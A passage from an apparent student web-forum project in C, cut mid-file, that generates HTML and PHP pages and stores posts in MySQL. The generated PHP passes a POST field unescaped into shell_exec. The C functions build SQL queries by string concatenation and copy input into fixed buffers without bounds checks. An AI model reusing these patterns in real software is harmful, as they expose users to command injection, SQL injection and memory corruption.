tagArgs);\n\tstrcat(finalTag, \"><button type=\\\"submit\\\"\");\n\tstrcat(finalTag, \" name=\\\"\");\n\tstrcat(finalTag, buttonName);\n\tstrcat(finalTag, \"\\\">\");\n\tstrcat(finalTag, buttonText);\n\tstrcat(finalTag, \"</button></form>\");\n\n\treturn finalTag;\n}\n\n\nchar* createInput(char* inputTag)\n{\n\tint i;\n\n\tchar tagArgs[1024];\n\tchar inputBuffer[2048];\n\tchar finalBuffer[2048];\n\n\tchar* finalTag;\n\tchar** attributes;\n\n\ti = 0;\n\n\ttagArgs[0] = '\\0';\n\tinputBuffer[0] = '\\0';\n\tfinalBuffer[0] = '\\0';\n\n\t/* gets the arguments for this tag. */\n\tattributes = getArgs(inputTag);\n\t\n\n\twhile(attributes[i] != NULL)\n\t{\n\t\t/* this is the action that will be done if the form is submitted. */\n\t\tif(strncmp(attributes[i], \"action\", 6) == 0)\n\t\t{\n\t\t\tchar* value;\n\n\t\t\tvalue = getValue(attributes[i]);\n\t\t\tstrcat(inputBuffer, \" action=\\\"\");\n\t\t\tstrcat(inputBuffer, value);\n\t\t\tstrcat(inputBuffer, \"\\\">\");\n\n\t\t\tfree(value);\n\t\t}\n\t\t/* text is after name. */\n\t\telse if(strncmp(attributes[i], \"text\", 4) == 0)\n\t\t{\n\t\t\tchar* value;\n\t\t\t\n\t\t\tvalue = getValue(attributes[i]);\n\t\t\tstrcat(inputBuffer, value);\n\n\t\t\tfree(value);\n\t\t}\n\t\t/* name must be first. */\n\t\telse if(strncmp(attributes[i], \"name\", 4) == 0)\n\t\t{\n\t\t\tchar* value;\n\n\t\t\tvalue = getValue(attributes[i]);\n\t\t\tstrcat(inputBuffer, \"<input type=\\\"text\\\" name=\\\"\");\n\t\t\tstrcat(inputBuffer, value);\n\t\t\tstrcat(inputBuffer, \"\\\"\");\n\n\n\t\t\tfree(value);\n\t\t}\n\t\t/* value is way after name, and just after text. 
*/\n\t\telse if(strncmp(attributes[i], \"value\", 5) == 0)\n\t\t{\n\t\t\tchar* value;\n\n\t\t\tvalue = getValue(attributes[i]);\n\t\t\tstrcat(inputBuffer, \" value=\\\"\");\n\t\t\tstrcat(inputBuffer, value);\n\t\t\tstrcat(inputBuffer, \"\\\"><br>\");\n\n\t\t\tfree(value);\n\t\t}\n\t\telse\n\t\t{\n\t\t\tstrcat(tagArgs, \" \");\n\t\t\tstrcat(tagArgs, attributes[i]);\n\t\t}\n\t\t\n\t\tfree(attributes[i]);\n\t\ti++;\n\t}\n\tfree(attributes);\n\n\tstrcat(inputBuffer, \"<input type=\\\"submit\\\" value=\\\"Submit\\\"></form>\");\n\n\tstrcat(finalBuffer, \"<form method=\\\"post\\\" \");\n\tstrcat(finalBuffer, tagArgs);\n\tstrcat(finalBuffer, inputBuffer);\n\n\tfinalTag = malloc(sizeof(char) * (strlen(finalBuffer) + 1));\n\tstrcpy(finalTag, finalBuffer);\n\t\n\treturn finalTag;\n}\n\n\nchar* createRadio(char* radioTag)\n{\n\tint i;\n\tint cbuff;\n\tint numButtons;\n\n\tchar tagArgs[1024];\n\tchar radioBuffer[2048];\n\tchar actionBuffer[512];\n\tchar nameBuffer[512];\n\tchar valueBuffers[64][256];\n\n\tchar* finalTag;\n\tchar** attributes;\n\n\n\ttagArgs[0] = '\\0';\n\tradioBuffer[0] = '\\0';\n\tactionBuffer[0] = '\\0';\n\tnameBuffer[0] = '\\0';\n\t\n\t/* clears all 64 buffers for the values that will eventually do something */\n\tfor(i = 0; i < 64; i++)\n\t{\n\t\tvalueBuffers[i][0] = '\\0';\n\t}\n\t\n\n\ti = 0;\n\tcbuff = 0;\n\tnumButtons = 0;\n\n\t/* gets the arguments for this tag. 
*/\n\tattributes = getArgs(radioTag);\n\n\tif(attributes != NULL)\n\t{\n\t\twhile(attributes[i] != NULL)\n\t\t{\n\t\t\tif(strncmp(attributes[i], \"action\", 6) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcpy(actionBuffer, value);\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\telse if(strncmp(attributes[i], \"name\", 4) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcpy(nameBuffer, value);\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\telse if(strncmp(attributes[i], \"value\", 5) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcpy(valueBuffers[cbuff], value);\n\t\t\t\tcbuff++;\n\t\t\t\tnumButtons++;\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tstrcat(tagArgs, \" \");\n\t\t\t\tstrcat(tagArgs, attributes[i]);\n\t\t\t}\n\n\t\t\tfree(attributes[i]);\n\t\t\ti++;\n\t\t}\n\t\tfree(attributes);\n\t}\n\n\tstrcat(radioBuffer, \"<form action=\\\"\");\n\tstrcat(radioBuffer, actionBuffer);\n\tstrcat(radioBuffer, \"\\\">\");\n\tfor(i = 0; i < numButtons; i++)\n\t{\n\t\tstrcat(radioBuffer, \"<input type=\\\"radio\\\" name=\\\"\");\n\t\tstrcat(radioBuffer, nameBuffer);\n\t\tstrcat(radioBuffer, \"\\\" value=\\\"\");\n\t\tstrcat(radioBuffer, valueBuffers[i]);\n\t\tstrcat(radioBuffer, \"\\\"\");\n\t\tif(i == 0)\n\t\t{\n\t\t\tstrcat(radioBuffer, \" checked\");\n\t\t}\n\t\tstrcat(radioBuffer, \">\");\n\t\tstrcat(radioBuffer, valueBuffers[i]);\n\t\tstrcat(radioBuffer, \"<br>\");\n\t}\n\tstrcat(radioBuffer, \"<input type=\\\"submit\\\" value=\\\"submit\\\"></form>\");\n\n\tfinalTag = malloc(sizeof(char) * (strlen(radioBuffer) + 1));\n\tstrcpy(finalTag, radioBuffer);\n\n\treturn finalTag;\n}\n\n\nchar* createPicture(char* pictureTag)\n{\n\tint i;\n\n\tchar tagArgs[1024];\n\tchar imageBuffer[512];\n\tchar width[5];\n\tchar height[5];\n\n\tchar* finalTag;\n\tchar** attributes;\n\n\ti = 0;\n\n\ttagArgs[0] = '\\0';\n\timageBuffer[0] = 
'\\0';\n\twidth[0] = '\\0';\n\theight[0] = '\\0';\n\n\t/* gets the arguments for this tag. */\n\tattributes = getArgs(pictureTag);\n\n\tif(attributes != NULL)\n\t{\n\t\twhile(attributes[i] != NULL)\n\t\t{\n\t\t\tif(strncmp(attributes[i], \"image\", 5) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcpy(imageBuffer, value);\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\telse if(strncmp(attributes[i], \"size\", 4) == 0)\n\t\t\t{\n\t\t\t\tint j;\n\t\t\t\tint swp;\n\t\t\t\tint cpos;\n\n\t\t\t\tchar* value;\n\n\t\t\t\tj = 0;\n\t\t\t\tswp = 0;\n\t\t\t\tcpos = 0;\n\n\t\t\t\t/* stored as <width>x<height> */\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tfor(j = 0; j < strlen(value); j++)\n\t\t\t\t{\n\t\t\t\t\tif(value[j] == 'x')\n\t\t\t\t\t{\n\t\t\t\t\t\tswp = 1;\n\t\t\t\t\t\twidth[cpos] = '\\0';\n\t\t\t\t\t\tcpos = 0;\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\t{\n\t\t\t\t\t\tif(swp == 1)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\theight[cpos] = value[j];\n\t\t\t\t\t\t}\n\t\t\t\t\t\telse\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\twidth[cpos] = value[j];\n\t\t\t\t\t\t}\n\t\t\t\t\t\tcpos ++;\n\t\t\t\t\t}\n\t\t\t\t\t\n\t\t\t\t}\n\t\t\t\theight[cpos] = '\\0';\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tstrcat(tagArgs, \" \");\n\t\t\t\tstrcat(tagArgs, attributes[i]);\n\t\t\t}\n\t\t\t\n\t\t\tfree(attributes[i]);\n\t\t\ti++;\n\t\t}\n\t\tfree(attributes);\n\t}\n\n\tfinalTag = malloc(sizeof(char) * (strlen(height) + strlen(width) + strlen(imageBuffer) + strlen(tagArgs) + strlen(\"<img src=\\\"\\\" alt=\\\"Image_\\\" height=\\\"\\\" width = \\\"\\\">\") + 1));\n\tfinalTag[0] = '\\0';\n\n\tstrcat(finalTag, \"<img src=\\\"\");\n\tstrcat(finalTag, imageBuffer);\n\tstrcat(finalTag, \"\\\" alt=\\\"Image_\");\n\tstrcat(finalTag, imageBuffer);\n\tstrcat(finalTag, \"\\\" width=\\\"\");\n\tstrcat(finalTag, width);\n\tstrcat(finalTag, \"\\\" height=\\\"\");\n\tstrcat(finalTag, height);\n\tstrcat(finalTag, \"\\\">\");\n\t\n\treturn finalTag;\n}\n\n\nchar* 
createExec(char* execTag)\n{\n\tint i;\n\n\tchar tagArgs[1024];\n\tchar execBuffer[2048];\n\n\tchar* finalTag;\n\tchar** attributes;\n\n\ti = 0;\n\n\ttagArgs[0] = '\\0';\n\texecBuffer[0] = '\\0';\n\n\t/* gets the arguments for this tag. */\n\tattributes = getArgs(execTag);\n\n\tif(attributes != NULL)\n\t{\n\n\t\twhile(attributes[i] != NULL)\n\t\t{\n\t\t\tif(strncmp(attributes[i], \"exe\", 3) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcpy(execBuffer, value);\t\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tstrcat(tagArgs, \" \");\n\t\t\t\tstrcat(tagArgs, attributes[i]);\n\t\t\t}\n\n\t\t\tfree(attributes[i]);\n\t\t\ti++;\n\t\t}\n\t\tfree(attributes);\n\t}\n\tfinalTag = malloc(sizeof(char) * (strlen(execBuffer) + strlen(tagArgs) + strlen(\"<?php exec(\\\"\\\", $output, $result); ?>\") + 1));\n\n\tstrcat(finalTag, \"<?php exec(\\\"\");\n\tstrcat(finalTag, execBuffer);\n\tstrcat(finalTag, \"\\\", $output, $result); \");\n\tstrcat(finalTag, tagArgs);\n\tstrcat(finalTag, \"?>\");\n\n\treturn finalTag;\n}\n\nchar* createDiv(char* divTag)\n{\n\tint i;\n\tchar tagArgs[1024];\n\tchar idBuffer[512];\n\tchar divBuffer[2048];\n\n\tchar* finalTag;\n\tchar** attributes;\n\n\ti = 0;\n\ttagArgs[0] = '\\0';\n\tidBuffer[0] = '\\0';\n\tdivBuffer[0] = '\\0';\n\n\tattributes = getArgs(divTag);\n\n\tif(attributes != NULL)\n\t{\n\t\twhile(attributes[i] != NULL)\n\t\t{\n\t\t\tif(strncmp(attributes[i], \"id\", 2) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcpy(idBuffer, value);\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tstrcat(tagArgs, \" \");\n\t\t\t\tstrcat(tagArgs, attributes[i]);\n\t\t\t}\n\n\t\t\tfree(attributes[i]);\n\t\t\ti++;\n\t\t}\n\t\tfree(attributes);\n\t}\n\t\n\tstrcpy(divBuffer, \"<div id=\\\"\");\n\tstrcat(divBuffer, idBuffer);\n\tstrcat(divBuffer, \"\\\" \");\n\tstrcat(divBuffer, tagArgs);\n\tstrcat(divBuffer, \">\");\n\n\tfinalTag = 
malloc(sizeof(char) * (strlen(divBuffer) + 1));\n\tstrcpy(finalTag, divBuffer);\n\n\treturn finalTag;\n}\n\n\nchar* createSelector(char* selTag)\n{\n\tint i;\n\tchar tagArgs[1024];\n\tchar formBuffer[512];\n\tchar buffer[2048];\n\n\tchar* finalTag;\n\tchar** attributes;\n\n\tattributes = getArgs(selTag);\n\ti = 0;\n\ttagArgs[0] = '\\0';\n\tbuffer[0] = '\\0';\n\n\tif(attributes != NULL)\n\t{\n\t\twhile(attributes[i] != NULL)\n\t\t{\n\t\t\tif(strncmp(attributes[i], \"form\", 4) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcpy(formBuffer, value);\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tstrcat(tagArgs, \" \");\n\t\t\t\tstrcat(tagArgs, attributes[i]);\n\t\t\t}\n\n\t\t\tfree(attributes[i]);\n\t\t\ti++;\n\t\t}\n\t\tfree(attributes);\n\t}\n\n\n\tstrcat(buffer, \"<?php\\n\");\n\tstrcat(buffer, \"$streamsraw = shell_exec(\\\"./db streams \\\\\\\"\\\".$_POST[\\\"username\\\"].\\\"\\\\\\\" strm 0 pdate\\\");\\n\");\n\tstrcat(buffer, \"$streams = explode(',', $streamsraw, 100);\\n\");\n\n\tstrcat(buffer, \"echo \\\"<select \");\n\tstrcat(buffer, tagArgs);\n\tstrcat(buffer, \" name=\\\\\\\"stream\\\\\\\" form=\\\\\\\"\");\n\tstrcat(buffer, formBuffer);\n\tstrcat(buffer, \"\\\\\\\">\\\\n\\\";\\n\");\n\n\tstrcat(buffer, \"foreach($streams as $stream)\\n{\\n\");\n\tstrcat(buffer, \"$stream = trim($stream);\\n\");\n\tstrcat(buffer, \"echo \\\"<option value=\\\\\\\"$stream\\\\\\\">$stream</option>\\\\n\\\";\\n}\\n\");\n\tstrcat(buffer, \"echo \\\"<option value=\\\\\\\"all\\\\\\\">all</option>\\\";\");\n\tstrcat(buffer, \"echo \\\"</select><br>\\\\n\\\";\\n\");\n\tstrcat(buffer, \"?>\");\n\n\tfinalTag = malloc(sizeof(char) * (strlen(buffer) + 1));\n\tstrcpy(finalTag, buffer);\n\n\treturn finalTag;\n}\n\n\nchar* createDependency(char* depTag)\n{\n\tint i;\n\tchar tagArgs[1024];\n\tchar idBuffer[512];\n\tchar varBuffer[512];\n\n\tchar depBuffer[2048];\n\n\tchar* finalTag;\n\tchar** attributes;\n\n\ti = 
0;\n\ttagArgs[0] = '\\0';\n\tidBuffer[0] = '\\0';\n\tdepBuffer[0] = '\\0';\n\n\tattributes = getArgs(depTag);\n\n\tif(attributes != NULL)\n\t{\n\t\twhile(attributes[i] != NULL)\n\t\t{\n\t\t\tif(strncmp(attributes[i], \"id\", 2) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcpy(idBuffer, value);\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\telse if(strncmp(attributes[i], \"dep\", 3) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcpy(varBuffer, value);\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tstrcat(tagArgs, \" \");\n\t\t\t\tstrcat(tagArgs, attributes[i]);\n\t\t\t}\n\n\t\t\tfree(attributes[i]);\n\t\t\ti++;\n\t\t}\n\t\tfree(attributes);\n\t}\n\n\tstrcpy(depBuffer, \"<?php echo \\\"<input type=\\\\\\\"hidden\\\\\\\" value=\\\\\\\"\\\".$_POST[\\\"\");\n\tstrcat(depBuffer, varBuffer);\n\tstrcat(depBuffer, \"\\\"].\\\"\\\\\\\" name=\\\\\\\"\");\n\tstrcat(depBuffer, varBuffer);\n\tstrcat(depBuffer, \"\\\\\\\" form=\\\\\\\"\");\n\tstrcat(depBuffer, idBuffer);\n\tstrcat(depBuffer, \"\\\\\\\" \");\n\tstrcat(depBuffer, tagArgs);\n\tstrcat(depBuffer, \">\\\"; ?>\");\n\n\tfinalTag = malloc(sizeof(char) * (strlen(depBuffer) + 1));\n\tstrcpy(finalTag, depBuffer);\n\n\treturn finalTag;\n}\n\n\nchar* createAdd(char* addTag)\n{\n\tchar buffer[2048];\n\n\tchar* finalTag;\n\n\tbuffer[0] = '\\0';\n\tstrcat(buffer, \"<?php\\n\");\n\tstrcat(buffer, \" echo \\\"<form id=\\\\\\\"adduser\\\\\\\" method=\\\\\\\"post\\\\\\\" action=\\\\\\\"addauthor.php\\\\\\\">\\\";\\n\");\n\tstrcat(buffer, \"echo \\\"<input type=\\\\\\\"text\\\\\\\" name=\\\\\\\"newstreams\\\\\\\"><br>\\\";\\n\");\n\tstrcat(buffer, \"$streamsraw = shell_exec(\\\"./db streams \\\\\\\"\\\".$_POST[\\\"username\\\"].\\\"\\\\\\\" strm 0 pdate\\\");\\n\");\n\tstrcat(buffer, \"$streams = explode(',', $streamsraw);\\n\");\n\tstrcat(buffer, \"foreach($streams as $stream)\\n{\\n $stream = trim($stream); echo \\\"<input 
type=\\\\\\\"checkbox\\\\\\\" name=\\\\\\\"streams[]\\\\\\\" value=\\\\\\\"$stream\\\\\\\">$stream<br>\\\";\\n}\\n\");\n\tstrcat(buffer, \"echo \\\"<input type=\\\\\\\"submit\\\\\\\" value=\\\\\\\"add\\\\\\\" name=\\\\\\\"action\\\\\\\"><input type=\\\\\\\"submit\\\\\\\" value=\\\\\\\"remove\\\\\\\" name=\\\\\\\"action\\\\\\\">\\\";\\n\");\n\tstrcat(buffer, \"echo \\\"</form>\\\";\\n?>\");\n\t\n\tfinalTag = malloc(sizeof(char) * (strlen(buffer) + 1));\n\tstrcpy(finalTag, buffer);\n\n\treturn finalTag;\n}\n\n\nchar* createView(char* viewTag)\n{\n\tchar buffer[2048];\n\n\tchar* finalTag;\n\n\tbuffer[0] = '\\0';\n\n\tstrcat(buffer, \"<?php\\n\");\n\n\tstrcat(buffer, \"echo \\\"<div id=\\\\\\\"view\\\\\\\">\\\\n\\\";\\n\");\n\tstrcat(buffer, \"echo \\\"<p>$post</p>\\\";\\n\");\n\tstrcat(buffer, \"echo \\\"</div>\\\";\\n\");\n\n\tstrcat(buffer, \"echo \\\"<form method=\\\\\\\"post\\\\\\\" action=\\\\\\\"view.php\\\\\\\" id=\\\\\\\"command\\\\\\\">\\\\n\\\";\\n\");\n\n\tstrcat(buffer, \"echo \\\"<button type=\\\\\\\"submit\\\\\\\" name=\\\\\\\"userin\\\\\\\" value=\\\\\\\"next\\\\\\\">Next</button>\\\\n\\\";\\n\");\n\tstrcat(buffer, \"echo \\\"<button type=\\\\\\\"submit\\\\\\\" name=\\\\\\\"userin\\\\\\\" value=\\\\\\\"prev\\\\\\\">Previous</button>\\\\n\\\";\\n\");\n\tstrcat(buffer, \"echo \\\"<button type=\\\\\\\"submit\\\\\\\" name=\\\\\\\"userin\\\\\\\" value=\\\\\\\"order\\\\\\\">Order</button>\\\\n\\\";\\n\");\n\tstrcat(buffer, \"echo \\\"<button type=\\\\\\\"submit\\\\\\\" name=\\\\\\\"userin\\\\\\\" value=\\\\\\\"mark\\\\\\\">Mark All</button>\\\\n\\\";\\n\");\n\tstrcat(buffer, \"echo \\\"<button form=\\\\\\\"switch\\\\\\\"type=\\\\\\\"submit\\\\\\\" name=\\\\\\\"userin\\\\\\\" value=\\\\\\\"next\\\\\\\">Switch Streams</button>\\\\n\\\";\\n\");\n\n\tstrcat(buffer, \"echo \\\"</form>\\\";\\n\");\n\n\tstrcat(buffer, \"echo \\\"<form method=\\\\\\\"post\\\\\\\" action=\\\\\\\"switch.php\\\\\\\" id=\\\\\\\"switch\\\\\\\"></form>\\\\n\\\";\\n\");\n\n\tstrcat(buffer, 
\"?>\\n\");\n\n\tfinalTag = malloc(sizeof(char) * (strlen(buffer) + 1));\n\tstrcpy(finalTag, buffer);\n\n\treturn finalTag;\n}\n\n\nchar* createPost(char* postTag)\n{\n\tchar buffer[2048];\n\tchar* finalTag;\n\n\tbuffer[0] = '\\0';\n\n\tstrcat(buffer, \"<?php\\n\");\n\tstrcat(buffer, \"echo \\\"<form id=\\\\\\\"post\\\\\\\" method=\\\\\\\"post\\\\\\\" action=\\\\\\\"post.php\\\\\\\">\\\\n\\\";\\n\");\n\tstrcat(buffer, \"echo \\\"<textarea name=\\\\\\\"post\\\\\\\" rows=\\\\\\\"20\\\\\\\" cols=\\\\\\\"70\\\\\\\">\\\\n</textarea><br>\\\\n\\\";\\n\");\n\n\tstrcat(buffer, \"echo \\\"<input type=\\\\\\\"submit\\\\\\\" name=\\\\\\\"postpressed\\\\\\\" value=\\\\\\\"submit\\\\\\\">\\\\n</form>\\\\n\\\";\\n\");\n\tstrcat(buffer, \"?>\");\n\n\tfinalTag = malloc(sizeof(char) * (strlen(buffer) + 1));\n\tstrcpy(finalTag, buffer);\n\n\treturn finalTag;\n}\n" }, { "alpha_fraction": 0.6351351141929626, "alphanum_fraction": 0.6351351141929626, "avg_line_length": 11.333333015441895, "blob_id": "628e2666b3d46ea4a622e58cf468f0d547100750", "content_id": "71d4bf6bdcaaf740a0bf9f8458bcd1905dabaa3e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 222, "license_type": "no_license", "max_line_length": 57, "num_lines": 18, "path": "/switch.php", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "<html>\n\n<head>\n\t<title>Change Streams</title>\n\t<link href=\"style.css\" type=\"text/css\" rel=\"stylesheet\">\n</head>\n\n<body>\n\n<?php\n\nexec(\"./create switch.wpml\", $output, $result);\ninclude \"interpret.php\";\n\n?>\n\n</body>\n</html>\n" }, { "alpha_fraction": 0.554460883140564, "alphanum_fraction": 0.5810071229934692, "avg_line_length": 15.529411315917969, "blob_id": "bc94967fa3e8acdc1208bc60692d920218e76e36", "content_id": "c9415ad33ea8d7e3959699627a6eab0d81bc5b7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 3654, "license_type": "no_license", 
"max_line_length": 136, "num_lines": 221, "path": "/stream.c", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "\n#include \"stream.h\"\n#include \"dbutils.h\"\n\n#include <time.h>\n#include <string.h>\n#include <stdio.h>\n#include <stdlib.h>\n\n\nchar* compdate()\n{\n\tchar* tstmp;\n\ttime_t rawNow;\n\n\tstruct tm * now;\n\n\t/* gets the raw time from the clock */\n\trawNow = time(NULL);\n\tnow = localtime(&rawNow);\n\n\ttstmp = malloc(sizeof(char) * 15);\n\n\t/* YYYY MM DD HH mm SS */\n\tsprintf(tstmp, \"%04d%02d%02d%02d%02d%02d\", now->tm_year + 1900, now->tm_mon + 1, now->tm_mday, now->tm_hour, now->tm_min, now->tm_sec);\n\ttstmp[14] = '\\0';\n\n\treturn tstmp;\n}\n\n\nint updateStream(struct userPost* st)\n{\n\tchar query[256];\n\tchar post[1024];\n\tchar* pdate;\n\n\tMYSQL sql;\n\n\tquery[0] = '\\0';\n\tpost[0] = '\\0';\n\n\tif(st == NULL)\n\t{\n\t\treturn -1;\n\t}\n\n\tmysql_init(&sql);\n\tmysql_options(&sql, MYSQL_READ_DEFAULT_GROUP, \"users\");\n\tif(!mysql_real_connect(&sql, HOSTNAME, USERNAME, PASSWORD, DATABASE, 0, NULL, 0))\n\t{\n\t\treturn -1;\n\t}\n\n\tpdate = compdate();\n\n\tsprintf(post, \"Sender: %s\\nDate: %s\\n%s\", st->username, st->date, st->text);\n\n\tstrcpy(query, \"insert into posts values ('\");\n\tstrcat(query, st->streamname);\n\tstrcat(query, \"', '\");\n\tstrcat(query, st->username);\n\tstrcat(query, \"', '\");\n\tstrcat(query, pdate);\n\tstrcat(query, \"', '\");\n\tstrcat(query, post);\n\tstrcat(query, \"')\");\n\n\tmysql_query(&sql, query);\n\n\tmysql_close(&sql);\n\n\tfree(pdate);\n\treturn 0;\n}\n\nint addUser(char* username, char* list)\n{\n\tint i;\n\tint cpos;\n\tchar buffer[512];\n\n\tMYSQL sql;\n\n\tcpos = 0;\n\n\tif(username == NULL || list == NULL)\n\t{\n\t\treturn -1;\n\t}\n\n\tmysql_init(&sql);\n\n\tmysql_options(&sql, MYSQL_READ_DEFAULT_GROUP, \"users\");\n\tif(!mysql_real_connect(&sql, HOSTNAME, USERNAME, PASSWORD, DATABASE, 0, NULL, 0))\n\t{\n\t\treturn -1;\n\t}\n\n\t/* find all the commas 
*/\n\tfor(i = 0; i < strlen(list); i++)\n\t{\n\t\tbuffer[cpos] = list[i];\n\t\tcpos ++;\n\n\t\t/* if we found a comma, we *should* have a complete file name */\n\t\tif(list[i] == ',' || i == strlen(list) - 1)\n\t\t{\n\t\t\tchar query[256];\n\n\t\t\tbuffer[cpos] = '\\0';\n\t\t\tquery[0] = '\\0';\n\n\t\t\tif(buffer[cpos - 1] == ',' || buffer[cpos - 1] == ' ')\n\t\t\t{\n\t\t\t\tbuffer[cpos - 1] = '\\0';\n\t\t\t}\n\n\t\t\tstrcat(query, \"insert into users values ('\");\n\t\t\tstrcat(query, username);\n\t\t\tstrcat(query, \"', '\");\n\t\t\tstrcat(query, buffer);\n\t\t\tstrcat(query, \"', '0')\");\n\n\t\t\tmysql_query(&sql, query);\n\n\t\t\tcpos = 0;\n\t\t\tbuffer[0] = '\\0';\n\n\t\t}\n\t}\n\n\tmysql_close(&sql);\n\treturn 0;\n}\n\nint removeUser(char* username, char* list)\n{\n\tint i;\n\tint cpos;\n\tchar buffer[256];\n\n\tMYSQL mysql;\n\n\tcpos = 0;\n\n\tif(username == NULL || list == NULL)\n\t{\n\t\treturn -1;\n\t}\n\n\tmysql_init(&mysql);\n\n\tmysql_options(&mysql, MYSQL_READ_DEFAULT_GROUP, \"users\");\n\tif(!mysql_real_connect(&mysql, HOSTNAME, USERNAME, PASSWORD, DATABASE, 0, NULL, 0))\n\t{\n\t\treturn -1;\n\t}\n\n\t/* find all the commas */\n\tfor(i = 0; i < strlen(list); i++)\n\t{\n\t\tbuffer[cpos] = list[i];\n\t\tcpos ++;\n\n\t\t/* if we found a comma, we *should* have a complete file name */\n\t\tif(list[i] == ',' || i == strlen(list) - 1)\n\t\t{\n\t\t\tchar query[256];\n\n\t\t\tquery[0] = '\\0';\n\t\t\tbuffer[cpos] = '\\0';\n\n\t\t\tif(buffer[cpos - 1] == ',')\n\t\t\t{\n\t\t\t\tbuffer[cpos - 1] = '\\0';\n\t\t\t}\n\n\n\t\t\tstrcat(query, \"delete from users where username='\");\n\t\t\tstrcat(query, username);\n\t\t\tstrcat(query, \"' and stream='\");\n\t\t\tstrcat(query, buffer);\n\t\t\tstrcat(query, \"'\");\n\n\t\t\tmysql_query(&mysql, query);\n\n\t\t\tbuffer[0] = '\\0';\n\t\t\tcpos = 0;\n\t\t}\n\t}\n\n\tmysql_close(&mysql);\n\n\treturn 0;\n}\n\nint checkIfPresent(char* fname, char* word)\n{\n\tchar line[1024];\n\tFILE* checkFile;\n\n\tcheckFile = 
fopen(fname, \"r\");\n\tif(checkFile == NULL)\n\t{\n\t\treturn 0;\n\t}\n\n\t/* check all lines in the file for word */\n\twhile(fgets(line, 1023, checkFile) != NULL)\n\t{\n\t\tif(strstr(line, word) != NULL)\n\t\t{\n\t\t\tfclose(checkFile);\n\t\t\treturn 1;\n\t\t}\n\t}\n\n\tfclose(checkFile);\n\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.56634920835495, "alphanum_fraction": 0.5813756585121155, "avg_line_length": 17.881118774414062, "blob_id": "f0e761ccd01f39309bc901060dd3b527db6fa0f6", "content_id": "f90c290fcc8a3d4ddb9cabcf96184d42bbdeaa5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 18900, "license_type": "no_license", "max_line_length": 296, "num_lines": 1001, "path": "/recognize.c", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "/**\n *\tJulian Sovernigo\n *\t0948924\n *\tCIS*2750_W17\n *\tgsoverni\n *\[email protected]\n *\n * \tthis file contains functions that are used to identify special patterns\n * \tthat occur in c/cpp files, such as function calls/declarations, variables,\n * \tclass declarations, and other things.\n */\n#include\"recognize.h\"\n#include<ctype.h>\n#include<stdio.h>\n#include<stdlib.h>\n#include<string.h>\n\nint nstrchr(char* string, char character)\n{\n\tint occurences;\n\tint length;\n\tint i;\n\n\tif(string == NULL)\n\t{\n\t\treturn -1;\n\t}\n\n\tlength = strlen(string);\n\toccurences = 0;\n\n\tfor(i = 0; i < length; i++) /* loop through the characters in the string */\n\t{\n\t\tif(string[i] == character)\n\t\t{\n\t\t\toccurences ++;\n\t\t}\n\t}\n\n\treturn occurences;\n}\n\nint isValidName(char* name)\n{\n\tconst char* keywords[] = 
{\"auto\",\"break\",\"case\",\"char\",\"const\",\"continue\",\"default\",\"do\",\"double\",\"else\",\"extern\",\"float\",\"for\",\"goto\",\"if\",\"int\",\"long\",\"register\",\"return\",\"short\",\"signed\",\"sizeof\",\"static\",\"struct\",\"switch\",\"typedef\",\"union\",\"unsigned\",\"void\",\"volatile\",\"while\",\"class\",NULL};\n\n\tunsigned int i;\n\n\tif(name == NULL)\n\t{\n\t\treturn -1;\n\t}\n\n\t/* if the first character is not an underscore or not alphabetical */\n\tif(!isalpha(name[0]) && name[0] != '_')\n\t{\n\t\treturn 0;\n\t}\n\n\t/* loop through the rest of the name */\n\tfor(i = 1; i < strlen(name); i++)\n\t{\n\t\tif(!isalpha(name[i]) && !isdigit(name[i]) && name[i] != '_')\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\n\ti = 0;\n\t/* loops through the keywords, NULL is placed at the end to protect from overflow. */\n\twhile(keywords[i] != NULL)\n\t{\n\t\t/* we do not want a variable to be named a keyword! 